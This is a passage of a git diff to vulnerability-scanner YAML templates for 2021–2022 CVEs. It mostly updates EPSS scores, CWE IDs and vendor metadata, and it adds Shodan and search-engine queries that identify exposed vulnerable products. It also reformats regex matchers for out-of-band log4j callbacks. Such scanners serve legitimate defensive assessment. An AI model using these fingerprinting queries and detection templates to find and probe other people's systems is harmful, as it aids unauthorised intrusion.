c1d7dcac9a..020cfe4c2e 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43798 cwe-id: CWE-22 - epss-score: 0.97473 + epss-score: 0.97484 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-percentile: 0.9995 metadata: max-request: 3 verified: "true" diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index 1da413932e..c93dc76f0d 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43810 cwe-id: CWE-79 - epss-score: 0.00376 + epss-score: 0.00513 cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* + epss-percentile: 0.73678 metadata: max-request: 1 vendor: admidio diff --git a/http/cves/2021/CVE-2021-44077.yaml b/http/cves/2021/CVE-2021-44077.yaml index 18d348a80c..e7bfd1585a 100644 --- a/http/cves/2021/CVE-2021-44077.yaml +++ b/http/cves/2021/CVE-2021-44077.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-44077 - cwe-id: CWE-287 - epss-score: 0.97363 + cwe-id: CWE-306 + epss-score: 0.97373 cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:* + epss-percentile: 0.99854 metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 9aabaf8681..8c994213e2 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-44138 cwe-id: CWE-22 - epss-score: 0.00472 + epss-score: 0.00867 cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:* + epss-percentile: 0.80249 metadata: max-request: 2 shodan-query: html:"Resin" diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 758167dc58..584ea98a81 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -13,10 +13,14 @@ info: cvss-score: 7.5 cve-id: CVE-2021-44139 cwe-id: CWE-918 + epss-score: 0.00769 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* + epss-percentile: 0.78983 metadata: max-request: 1 shodan-query: title:"Sentinel Dashboard" + vendor: hashicorp + product: sentinel tags: cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel http: diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index dde2a51d4a..4e1956e3ba 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-44152 - cwe-id: CWE-287 - epss-score: 0.25951 - cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + cwe-id: CWE-306 + epss-score: 0.66748 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.9749 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index da8b77e82c..8abbd3c46d 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -18,8 +18,9 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-20,CWE-917 - epss-score: 0.97569 + epss-score: 0.97566 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* + epss-percentile: 0.99996 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index 8056e1b30d..a6ce928f87 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44427 cwe-id: CWE-89 - epss-score: 0.01567 + epss-score: 0.04257 cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:* + epss-percentile: 0.91177 metadata: max-request: 1 vendor: rosariosis diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index 1c0afa7192..1228d302c6 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 - epss-score: 0.00824 + epss-score: 0.00853 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* + epss-percentile: 0.80105 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index ad4a690e87..2c5eac1103 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44515 cwe-id: CWE-287 - epss-score: 0.97483 + epss-score: 0.97478 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:* + epss-percentile: 0.99947 metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 94129086ee..95cfdcde58 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-44528 cwe-id: CWE-601 - epss-score: 0.00117 + epss-score: 0.00087 cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* + epss-percentile: 0.35778 metadata: max-request: 1 vendor: rubyonrails diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index f6db2be54c..130ebe164b 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-44529 cwe-id: CWE-94 - epss-score: 0.96445 + epss-score: 0.95797 cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* + epss-percentile: 0.99192 metadata: max-request: 1 shodan-query: title:"LANDesk(R) Cloud Services Appliance" diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index d634da58c3..c118a4c82b 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-203 epss-score: 0.01597 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* + epss-percentile: 0.85774 metadata: max-request: 1 vendor: cybelesoft diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index c185240417..cd8e1589bf 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-45043 cwe-id: CWE-22 - epss-score: 0.07455 + epss-score: 0.05404 cpe: cpe:2.3:a:hd-network_real-time_monitoring_system_project:hd-network_real-time_monitoring_system:2.0:*:*:*:*:*:*:* + epss-percentile: 0.9216 metadata: max-request: 1 google-query: intitle:"HD-Network Real-time Monitoring System V2.0" diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 7316b957e7..cf72bd1079 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9 cve-id: CVE-2021-45046 cwe-id: CWE-917 - epss-score: 0.97411 + epss-score: 0.97405 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* + epss-percentile: 0.9988 metadata: max-request: 1 vendor: apache @@ -58,7 +59,7 @@ http: - type: regex part: interactsh_request regex: - - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output + - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output extractors: - type: kval @@ -68,10 +69,10 @@ http: - type: regex group: 2 regex: - - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output - type: regex group: 1 regex: - - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output - part: interactsh_request \ No newline at end of file + - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output + part: interactsh_request diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 95fa04c967..37b44caf3b 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45092 cwe-id: CWE-74 - epss-score: 0.28597 + epss-score: 0.05789 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* + epss-percentile: 0.92399 metadata: max-request: 1 vendor: cybelesoft diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index 98f212c739..455bc57ce9 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45232 cwe-id: CWE-306 - epss-score: 0.97304 + epss-score: 0.97298 cpe: cpe:2.3:a:apache:apisix_dashboard:*:*:*:*:*:*:*:* + epss-percentile: 0.99794 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index bb2b58f08d..3c584cb7b4 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-45380 cwe-id: CWE-79 - epss-score: 0.03708 + epss-score: 0.02148 cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* + epss-percentile: 0.87858 metadata: max-request: 1 shodan-query: http.html:"Powerd by AppCMS" diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index f76f3dc3bc..47c712ed6e 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-45422 cwe-id: CWE-79 - epss-score: 0.00287 + epss-score: 0.00218 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* + epss-percentile: 0.59071 metadata: max-request: 1 shodan-query: http.html:"Reprise License" diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index dde1918f98..fc38781ffd 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45428 cwe-id: CWE-639 - epss-score: 0.07223 + epss-score: 0.08441 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.93587 metadata: max-request: 3 shodan-query: http.html:"TLR-2005KSH" diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index a8e84f6b70..0b98c4a6f9 100644 --- a/http/cves/2021/CVE-2021-45967.yaml +++ b/http/cves/2021/CVE-2021-45967.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45967 cwe-id: CWE-22 - epss-score: 0.54239 + epss-score: 0.71742 cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:* + epss-percentile: 0.97631 metadata: max-request: 1 vendor: pascom_cloud_phone_system diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index ad89aedfbd..a673b1eff3 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-45968 cwe-id: CWE-918 - epss-score: 0.00699 + epss-score: 0.01551 cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* + epss-percentile: 0.85551 metadata: max-request: 3 vendor: jivesoftware diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index 12e036e849..cf5910473d 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.4 cve-id: CVE-2021-46005 cwe-id: CWE-79 - epss-score: 0.00135 + epss-score: 0.00143 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.49483 metadata: max-request: 3 vendor: car_rental_management_system_project diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index 6244d9d704..6228048dac 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.8 cve-id: CVE-2021-46068 cwe-id: CWE-79 - epss-score: 0.00093 + epss-score: 0.00084 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* + epss-percentile: 0.34592 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 3836b73e23..67c3d71246 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.8 cve-id: CVE-2021-46069 cwe-id: CWE-79 - epss-score: 0.00093 + epss-score: 0.00084 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* + epss-percentile: 0.34592 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index ea9adf4100..fb2fb31736 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.8 cve-id: CVE-2021-46071 cwe-id: CWE-79 - epss-score: 0.00093 + epss-score: 0.00084 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* + epss-percentile: 0.34592 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 7c6a2b5497..8d57820f77 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.8 cve-id: CVE-2021-46072 cwe-id: CWE-79 - epss-score: 0.00093 + epss-score: 0.00084 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* + epss-percentile: 0.34592 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index d072a7e582..a7c04dd532 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -16,8 +16,9 @@ info: cvss-score: 4.8 cve-id: CVE-2021-46073 cwe-id: CWE-79 - epss-score: 0.00093 + epss-score: 0.00084 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* + epss-percentile: 0.34592 metadata: max-request: 3 verified: true diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 820d50d9a1..3aeb0c27f1 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-46379 cwe-id: CWE-601 - epss-score: 0.00246 + epss-score: 0.00247 cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:* + epss-percentile: 0.61872 metadata: max-request: 1 verified: true diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index de726d46f2..0b393ebf37 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46381 cwe-id: CWE-22 - epss-score: 0.0131 + epss-score: 0.01229 cpe: cpe:2.3:o:dlink:dap-1620_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.8365 metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 9f48696ea7..3a5c61f08a 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2021-46387 cwe-id: CWE-79 - epss-score: 0.00455 + epss-score: 0.00475 cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.72639 metadata: max-request: 1 shodan-query: http.title:"Zywall2Plus" diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 61130512ba..8c160dd35d 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46417 cwe-id: CWE-22 - epss-score: 0.66863 + epss-score: 0.72699 cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* + epss-percentile: 0.97658 metadata: max-request: 1 shodan-query: http.html:"Franklin Fueling Systems" diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index c13e9c8d08..b78a305c13 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-78 epss-score: 0.95441 cpe: cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:* + epss-percentile: 0.99106 metadata: max-request: 1 shodan-query: html:"SDT-CW3B1" diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 7db8fea21f..4591c8fc78 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-306 epss-score: 0.01459 cpe: cpe:2.3:o:telesquare:tlr-2005ksh_firmware:1.0.0:*:*:*:*:*:*:* + epss-percentile: 0.85053 metadata: max-request: 3 shodan-query: http.html:"TLR-2005KSH" diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 6f9991026b..f7c4d426a9 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2021-46704 cwe-id: CWE-78 - epss-score: 0.95477 + epss-score: 0.94979 cpe: cpe:2.3:a:genieacs:genieacs:*:*:*:*:*:*:*:* + epss-percentile: 0.98995 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 1f7ab375b1..613d03ecbe 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-0140 - cwe-id: CWE-200 - epss-score: 0.00851 + cwe-id: CWE-306 + epss-score: 0.01084 cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.82506 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 7858a257d0..590bde1121 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0147 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00133 cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47722 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index fcf6700b18..6cf5cc2cf9 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0148 cwe-id: CWE-79 - epss-score: 0.00192 + epss-score: 0.00165 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.52528 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index 893c38ec33..2644f9dd69 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0149 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00115 cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44376 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index dddeee07b8..29a1261060 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0150 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00133 cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47722 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index 2201b2690c..46573fe1d7 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0165 cwe-id: CWE-601 - epss-score: 0.00097 + epss-score: 0.00133 cpe: cpe:2.3:a:king-theme:kingcomposer:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47728 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 37020090e4..431511996c 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -6,19 +6,28 @@ info: severity: critical description: | The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection - remediation: This is resolved in release 1.6.0. reference: - https://wpscan.com/vulnerability/0b4d870f-eab8-4544-91f8-9c5f0538709c - https://wordpress.org/plugins/photo-gallery/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0169 + - https://plugins.trac.wordpress.org/changeset/2672822/photo-gallery#file9 + remediation: This is resolved in release 1.6.0. classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-0169 + cwe-id: CWE-89 + epss-score: 0.01109 + cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.82695 metadata: max-request: 1 verified: true publicwww-query: "/wp-content/plugins/photo-gallery" - tags: cve,cve2022,wp,wp-plugin,wordpress,sqli,photo-gallery - + framework: wordpress + vendor: 10web + product: photo_gallery + tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,sqli,photo-gallery variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index f72ea322d1..02fb94a313 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0189 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00133 cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47722 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index 7e240de9c2..fc44769404 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0201 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00115 cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.44376 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 02296942a4..aec7e74080 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0206 cwe-id: CWE-79 - epss-score: 0.00119 + epss-score: 0.00122 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45705 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index d3d4ed29d9..e4aa5e4299 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0208 cwe-id: CWE-79 - epss-score: 0.00119 + epss-score: 0.00122 cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45705 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index 6176646f60..c3b62c3fef 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0212 cwe-id: CWE-79 - epss-score: 0.00097 + epss-score: 0.00099 cpe: cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40308 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index c1cf8012d8..f26b521e2b 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0218 cwe-id: CWE-79 - epss-score: 0.03637 + epss-score: 0.03872 cpe: cpe:2.3:a:codemiq:wordpress_email_template_designer:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.90766 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 